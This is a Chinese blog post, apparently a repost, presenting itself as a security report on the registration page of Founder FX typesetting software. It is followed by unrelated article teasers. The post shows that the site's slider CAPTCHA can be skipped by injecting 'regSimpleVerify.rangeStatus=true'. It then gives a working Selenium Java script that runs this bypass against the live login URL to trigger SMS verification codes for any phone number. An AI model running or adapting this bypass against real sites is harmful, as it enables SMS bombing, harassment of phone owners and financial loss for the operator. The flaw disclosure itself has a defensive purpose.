【方正飞翔-注册/登录安全分析报告-验证结果保存到前端变量导致安全隐患】

news2024/11/16 1:41:38

前言

由于网站注册入口容易被黑客攻击,存在如下安全问题:

1. 暴力破解密码,造成用户信息泄露

2. 短信盗刷的安全问题,影响业务及导致用户投诉

3. 带来经济损失,尤其是后付费客户,风险巨大,造成亏损无底洞

一、 方正飞翔PC 注册入口

简介: 方正飞翔是方正在复合出版背景下开发的新一代的专业排版领域的设计软件,于2009年发布,它基于新的开放的面向对象体系,可实现高度的扩展性,支持插件功能。对Word文档的良好兼容,以及基于其自有专利的公式排版技术,方正飞翔赢得了出版人士的高度认可。
在这里插入图片描述

二、 安全性分析报告:

方正飞翔研发的类似阿里的滑动条验证方式,存在严重的致命缺陷,使设计的功能无效,攻击者可以通过改变页面变量跳过这个步骤。

在这里插入图片描述

三、 测试方法:

前端界面分析,这是方正飞翔自己研发的滑动验证码,网上没有现成的教学视频,但形式都差不多,发现严重问题:
前端利用滑动结果保存到前台变量 regSimpleVerify.rangeStatus,用JS 注入方式直接改变 regSimpleVerify.rangeStatus=true即可
这次还是采用模拟器的方式,简单,只需要注入JS,1步就可以搞定:

1. 注入脚本, regSimpleVerify.rangeStatus=true

1 模拟器交互部分


private static String INDEX_URL = "http://www.founderfx.cn/fxsso/login?_scope=1";
	
	@Override
	public RetEntity send(WebDriver driver, String areaCode, String phone) {
		RetEntity retEntity = new RetEntity();
		try {
			driver.get(INDEX_URL);
			WebElement phoneEle = driver.findElement(By.id("username_reg"));
			phoneEle.sendKeys(phone);

			String js = "regSimpleVerify.rangeStatus=true;console.log(regSimpleVerify);";
			((JavascriptExecutor) driver).executeScript(js);
			WebElement sendElement = driver.findElement(By.id("btnSend"));
			sendElement.click();
			Thread.sleep(1000);
			WebElement alertElement = driver.findElement(By.id("layui-layer1"));

			if (alertElement != null && alertElement.isDisplayed()) {
				String alertInfo = alertElement.findElement(By.className("layui-layer-content")).getText();
				retEntity.setMsg(alertInfo);
				return retEntity;
			}
			String gtInfo = sendElement.getAttribute("value");
			retEntity.setMsg(gtInfo);
			if (gtInfo != null && gtInfo.contains("后重新发送")) {
				retEntity.setRet(0);
			} else {
				System.out.println("gtInfo=" + gtInfo);
			}
		} catch (Exception e) {
			System.out.println(e.toString());
			retEntity.setRet(-1);
			retEntity.setMsg(e.toString());
		} finally {
			driver.manage().deleteAllCookies();
		}
		return retEntity;
	}



  由于碰到严重设计缺陷,本次测评非常简单

二丶结语

方正飞翔是方正电子旗下的专业排版领域的设计软件,作为老牌软件厂商,技术实力雄厚,但本次测评时,存在将验证结果保存在前端变量中, 这就明白的告诉攻击者,答案已经给你了,不需要进行滑动验证。最终如皇帝的新装, 等于没有。总之作为实力雄厚的软件公司,出现这么严重的低级问题! 在业界面前被打脸, 对不起自己的在出版行业的巨头地位 !

很多人在短信服务刚开始建设的阶段,可能不会在安全方面考虑太多,理由有很多。
比如:“ 需求这么赶,当然是先实现功能啊 ”,“ 业务量很小啦,系统就这么点人用,不怕的 ” , “ 我们怎么会被盯上呢,不可能的 ”等等。

有一些理由虽然有道理,但是该来的总是会来的。前期欠下来的债,总是要还的。越早还,问题就越小,损失就越低。

所以大家在安全方面还是要重视。(血淋淋的栗子!)#安全短信#

戳这里→康康你手机号在过多少网站注册过!!!

谷歌图形验证码在AI 面前已经形同虚设,所以谷歌宣布退出验证码服务, 那么当所有的图形验证码都被破解时,大家又该如何做好防御呢?

>>相关阅读
《腾讯防水墙滑动拼图验证码》
《百度旋转图片验证码》
《网易易盾滑动拼图验证码》
《顶象区域面积点选验证码》
《顶象滑动拼图验证码》
《极验滑动拼图验证码》
《使用深度学习来破解 captcha 验证码》
《验证码终结者-基于CNN+BLSTM+CTC的训练部署套件》

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2053240.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

网站建站有哪些方法

1. 传统网站建设 特点: 通过手动编写HTML、CSS和JavaScript等前端代码,结合后端开发语言(如PHP、Java、.NET等)和数据库技术(如MySQL、Oracle等)来构建网站。 灵活性和可定制性高,可以根据需…

资产负债率、净资产收益率怎么分析?教你弄懂财务报表的关键

财务报表中包含大量的信息,如果我们在解读财务报表时没有思路,不分重点,就很容易被繁杂的数据弄得头晕眼花。本文就财务报表中的关键指标、资产负债率解读、净资产收益率分析、计算销售复合增长率等几个方面进行介绍,大家可以根据…

防止网络环路,98%的网工都是这么操作的

号主:老杨丨11年资深网络工程师,更多网工提升干货,请关注公众号:网络工程师俱乐部 我的网工朋友,大家好。 你肯定知道这个经典网络组网模型:接入-汇聚-核心-出口。 接入多数是二层交换机为主,…

Vue3 +Elementplus的学习 (用vite构建项目)

一、创建vite3项目: 1、在某个盘下面新建项目的文件夹,然后右键,在终端打开: 2、输入命令: npm init vite 3、输入项目名称: 4、选择框架vue: 5、选择JavaScript: 6、进入到项目文件夹:

瑞幸因《黑神话:悟空》被骂惨;雷军小米汽车正研究进入欧洲;Meta Quest 3 头显透视摄像头被「破解」| 网易数智日报

今日,网易数智日报来啦~~ 1.刚刚,瑞幸因《黑神话:悟空》被骂惨,A股却“牛”了! “官方昨天在直播间明确表示门店一开门就能核销套餐,今天又改口9点之后才能买。”“明明吧台上一堆周边,但是买不…

高维数据检索:局部敏感哈希算法

文章目录 LSH 算法的原理工作原理LSH 模拟实现应用示例 LSH 的优缺点优点缺点实际案例 优化策略存在的挑战与局限性优化方向多哈希策略其他优化点 LSH 在大数据环境中的扩展性与适应性大数据环境下的挑战结合分布式系统的解决方案使用 Apache Spark 进行 LSH 结语 局部敏感哈希…

day24 Java面向对象——什么是面向对象

day24 Java面向对象——什么是面向对象 文章目录 day24 Java面向对象——什么是面向对象1. 什么是面向对象面向对象的核心概念面向对象的优点示例 1. 什么是面向对象 在Java中,面向对象编程(Object-Oriented Programming,OOP)是一…

ardupilot开发 --- 故障保护 篇

不患贫而患不均,不患寡而患不安 RC 故障触发因素参数保护动作如何设置关于 SmartRTL、RTL 的返航高度 RC 故障 触发因素 遥控器关机 丢失连接、超出连接RC范围 遥控器油门值低于 FS_THR_VALUE. 遥控接收机(天空端)失去电源 遥控接收机与飞控的连接出现故障 等等…

跨云容灾原来还能这么便捷!

背景 大量组织正在将业务系统迁移到云,以利用其可扩展性。而云上的业务连续性保护依然重要,灾难,病毒,人为错误等仍然在威胁企业数据安全。 云平台被广泛采用作为各种规模企业的首选容灾平台,是 DRaaS 的重要市场驱动…

基于云快充协议1.5-1.6版本的充电桩系统软件-充电桩系统 -新能源车充电平台源码

介绍 SpringBoot 框架,充电桩平台充电桩系统充电平台充电桩互联互通协议云快充协议1.5-1.6协议新能源汽车二轮车公交车二轮车充电-四轮车充电充电源代码充电平台源码Java源码 充电桩平台充电桩系统充电桩小程序充电桩管理系统充电桩项目充电桩协议充电桩微信小程序S…

收藏,Wireshark最好用的抓包命令都在这了

号主:老杨丨11年资深网络工程师,更多网工提升干货,请关注公众号:网络工程师俱乐部 下午好,我的网工朋友。 在现在,网络流量的监控与分析变得尤为重要。 无论是排查网络故障、优化性能还是确保网络安全&…

笔记分享: 香港中文大学CSCI5610高级数据结构——最邻近查询

文章目录 Approximate Nearest Neighbor Search \textbf{Approximate Nearest Neighbor Search} Approximate Nearest Neighbor Search 1. Doubling Dimension \textbf{1. Doubling Dimension} 1. Doubling Dimension 1.0. Intro \textbf{1.0. Intro} 1.0. Intro 1.1. Doubling…

对于mp4 ios和mac safari不能播放问题处理

直接对原mp4文件进行重新转码就可以了 ffmpeg -i origin.mp4 -vcodec h264 -profile:v high -level 4.1 orgin_hl.mp4 原因源文件不符合苹果基本规则 苹果官网文档

Shell:控制脚本 - 信号量

1. 处理信号 1.1 重温Linux信号 Linux系统和应用程序可以生成超过30个信号。表16-1列出了在Linux编程时会遇到的最常见 的Linux系统信号。 通过SIGINT信号,可以中断shell。 你可能也注意到了,shell会将这些信号传给shell脚本程序来处理。而shell脚本…

图像增强技术简介

目录 一、概论 二、图像噪声 三、图像增强处理分类 一、概论 图像增强作为基本的图像处理技术,其目的是对图像进行加工,以得到对具体应用来说视觉效果更“好”更“有用”的图像。图像增强算法并不能增加原始图像的信息,而是通过某种技术手…

基础数据结构 -- 图

1 简介 图是一种用 节点 和 边 来表示相互关系的数学模型,其中节点代表事物,边代表事物间的联系。图作为一种数据结构,在各种领域都有广泛应用,如社交网络、城市交通网络、互联网页面链接等。 图由两个主要部分构成: 节…

XXX【4】策略模式

如上图所示,如果要加入一个新的货币,那么就需要对类中的Calculate函数进行修改,这违背了封闭开放原则。 上图中的方式更加合适,搞一个抽象类(方法中可以用多态调用),然后每个货币自己是一个类&a…

井盖异动传感器:为城市安全加码

城市的地下管网错综复杂,井盖作为连接地面与地下的重要通道,其安全性至关重要。然而,由于各种原因导致的井盖丢失或损坏事件时有发生,给行人和车辆带来了极大的安全隐患。 一、智能科技,守护脚下安全 旭华智能井盖异…

3D可视化项目

3D可视化项目是指利用3D技术和工具来将数据、场景或概念以可视化的方式呈现出来,以便更好地理解和分析。这些项目通常涉及使用3D建模、渲染和动画技术,将数据或概念转化为具有深度和逼真感的可视化场景或对象。3D可视化项目涉及到的技术栈主要包括以下几…

从零开始掌握限流技术:计数器、滑动窗口、漏桶与令牌桶详解

为什么需要限流呢? 🔹想象一下,你的服务器就像一个繁忙的餐馆,而你的应用就像是餐馆的服务员。餐馆里人山人海,每个人都在争先恐后地想要点餐。这时候,如果没有一个好的限流机制,会发生什么呢&…